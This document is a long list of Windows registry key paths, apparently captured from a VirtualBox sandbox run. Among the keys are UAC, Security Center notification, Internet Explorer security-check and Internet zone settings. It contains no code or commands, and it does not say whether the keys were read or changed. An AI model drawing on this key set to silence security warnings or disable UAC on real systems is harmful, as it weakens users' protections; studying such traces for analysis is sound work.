HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.102\CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.104\CheckSetting
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Disabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Disabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{852FB1F8-5CC6-4567-9C0E-7C330F8807C2}.check.100\CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\LastQueuePesterTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\QueuePesterInterval
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\QueuePesterInterval
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{852FB1F8-5CC6-4567-9C0E-7C330F8807C2}.check.101\CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0\CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Providers\EventLog\{01979c6a-42fa-414c-b8aa-eee2c8202018}\LastKnownState
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B722BCCB-4E68-101B-A2BC-00AA00404770}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{01979c6a-42fa-414c-b8aa-eee2c8202018}.check.100\CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{01979c6a-42fa-414c-b8aa-eee2c8202018}.check.101\CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Providers\EventLog\{945a8954-c147-4acd-923f-40c45405a658}\LastKnownState
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\InProcServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{945a8954-c147-4acd-923f-40c45405a658}.check.42\CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Providers\EventLog\{DAB69A6A-4D2A-4D44-94BF-E0091898C881}\LastKnownState
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{DAB69A6A-4D2A-4D44-94BF-E0091898C881}.check.100\CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Providers\EventLog\{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}\LastKnownState
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}.check.101\CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Providers\EventLog\{A5268B8E-7DB5-465b-BAB7-BDCDA39A394A}\LastKnownState
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{A5268B8E-7DB5-465b-BAB7-BDCDA39A394A}.check.100\CheckSetting
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{35786D3C-B075-49b9-88DD-029876E11C01}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{9113A02D-00A3-46B9-BC5F-9C04DADDD5D7}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{b155bdf8-02f0-451e-9a26-ae317cfd7779}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF}\SortOrderIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF}\InProcServer32\LoadWithoutCOM
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D}\SortOrderIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{35786D3C-B075-49B9-88DD-029876E11C01}\SortOrderIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7007ACC7-3202-11D1-AAD2-00805FC1270E}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7007ACC7-3202-11D1-AAD2-00805FC1270E}\InProcServer32\LoadWithoutCOM
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7007ACC7-3202-11D1-AAD2-00805FC1270E}\SortOrderIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}\System.ItemNameDisplay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}\{B725F130-47EF-101A-A5F1-02608C9EEBAC} 10
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}\LocalizedString
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings\StringCacheGeneration
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@C:\Windows\system32\prnfldr.dll,-8036
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7007ACC7-3202-11D1-AAD2-00805FC1270E}\System.ItemNameDisplay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7007ACC7-3202-11D1-AAD2-00805FC1270E}\{B725F130-47EF-101A-A5F1-02608C9EEBAC} 10
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7007ACC7-3202-11D1-AAD2-00805FC1270E}\LocalizedString
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@C:\Windows\system32\netshell.dll,-1200
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\LocalizedString
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\System.HideOnDesktop
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\{28636AA6-953D-11D2-B5D6-00C04FD918D0} 34
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon\OpenIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\System.FileAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\{B725F130-47EF-101A-A5F1-02608C9EEBAC} 13
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\System.DateModified
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\{B725F130-47EF-101A-A5F1-02608C9EEBAC} 14
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\GlobalAssocChangedCounter
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableFixSecuritySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security\DisableFixSecuritySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1001
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1004
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1201
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1405
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1800
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1803
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1804
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1806
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1806
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\VistaSp1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AutoUpdateDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\InternetSettingsDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\LockTaskbar
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\TaskbarSizeMove
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\TaskbarSizeMove
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{08432F33-FDBC-422D-AEE0-FC61F43E7059}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}\Reason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{08432F33-FDBC-422D-AEE0-FC61F43E7059}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}\ID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{08432F33-FDBC-422D-AEE0-FC61F43E7059}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}\Data
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{08432F33-FDBC-422D-AEE0-FC61F43E7059}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{08432F33-FDBC-422D-AEE0-FC61F43E7059}\{424D33A4-8055-498D-9ECE-6FCE0CB2FF40}\Reason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{08432F33-FDBC-422D-AEE0-FC61F43E7059}\{424D33A4-8055-498D-9ECE-6FCE0CB2FF40}\ID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{08432F33-FDBC-422D-AEE0-FC61F43E7059}\{424D33A4-8055-498D-9ECE-6FCE0CB2FF40}\Data
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{08432F33-FDBC-422D-AEE0-FC61F43E7059}\{424D33A4-8055-498D-9ECE-6FCE0CB2FF40}\Scope
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\AcceptedPrivacyStatement
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LocalService
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ServiceParameters
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\RunAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ActivateAtStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ROTFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\AppIDFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LaunchPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyAuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyImpersonationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\RemoteServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\SRPTrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\PreferredServerBitness
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LoadUserSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\AppID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalService
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\DllSurrogate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\RunAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\ActivateAtStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\ROTFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\AppIDFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LaunchPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\RemoteServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\SRPTrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\PreferredServerBitness
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LoadUserSettings
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\##?#IDE#DiskVBOX_HARDDISK___________________________1.0_____#5&33d1638a&0&0.0.0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCIIDE\IDECHANNEL\4&2617AEAE&0&0\ClassGUID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_2829&SUBSYS_00000000&REV_02\3&267A616A&0&68\ClassGUID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ACPI\PNP0A03\0\ClassGUID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ACPI_HAL\PNP0C08\0\ClassGUID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\ACPI_HAL\0000\ClassGUID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HTREE\ROOT\0\ClassGUID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0\ConfigFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0\LogConf\ForcedConfig
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0\DeviceDesc
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\LocaleName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0\FriendlyName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0\Mfg
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\LocalService
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\ServiceParameters
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\RunAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\ActivateAtStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\ROTFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\AppIDFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\LaunchPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\RemoteServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\SRPTrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\PreferredServerBitness
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\LoadUserSettings
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_80EE&DEV_CAFE&SUBSYS_00000000&REV_00\3&267A616A&0&20\Class
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\CDROMVBOX_CD-ROM_____________________________1.0_____\5&106AF171&0&1.0.0\HardwareID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_7111&SUBSYS_00000000&REV_01\3&267A616A&0&09\HardwareID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCIIDE\IDECHANNEL\4&2617AEAE&0&0\HardwareID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCIIDE\IDECHANNEL\4&2F42C713&0&0\HardwareID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCIIDE\IDECHANNEL\4&2F42C713&0&1\HardwareID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_2829&SUBSYS_00000000&REV_02\3&267A616A&0&68\HardwareID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_80EE&DEV_BEEF&SUBSYS_00000000&REV_00\3&267A616A&0&10\HardwareID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\ClassGUID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\HardwareID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#PCI#VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02#3&267a616a&0&18#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#*ISATAP#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_AGILEVPNMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_L2TPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_NDISWANBH#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_NDISWANIP#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_NDISWANIPV6#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_PPPOEMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_PPTPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_SSTPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#SYSTEM#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\ClassGUID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Phantom
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\ContainerID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Legacy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\ConfigFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{cac88484-7515-4c03-82e6-71a87abac361}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\HardwareID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\CompatibleIDs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{cac88484-7515-4c03-82e6-71a87abac361}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361}\#\Control\Linked
